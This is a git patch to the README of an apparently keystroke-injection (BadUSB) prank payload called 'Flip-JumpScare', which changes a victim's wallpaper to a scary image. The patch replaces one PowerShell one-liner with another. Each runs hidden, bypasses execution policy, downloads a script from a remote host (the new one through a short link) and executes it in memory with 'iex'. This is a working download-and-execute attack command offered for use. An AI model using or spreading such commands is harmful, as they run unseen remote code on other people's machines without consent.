From ed239e1c37c9ce052a36946651f02437987f9f6f Mon Sep 17 00:00:00 2001 From: I-Am-Jakoby Date: Sun, 18 Dec 2022 14:13:49 -0600 Subject: [PATCH] Update README.md --- Payloads/Flip-JumpScare/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Payloads/Flip-JumpScare/README.md b/Payloads/Flip-JumpScare/README.md index 61e14a7..3b2209d 100644 --- a/Payloads/Flip-JumpScare/README.md +++ b/Payloads/Flip-JumpScare/README.md @@ -37,7 +37,7 @@ At that point there desktop wallpaper will be changed to the scary image provide * Plug in your device * Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory ``` -powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https://raw.githubusercontent.com/I-Am-Jakoby/hak5-submissions/main/OMG/Payloads/OMG-JumpScare/JumpScare.ps1?dl=1; invoke-expression $pl +powershell -w h -NoP -NonI -Exec Bypass iwr jakoby.lol/0tn | iex ```

(back to top)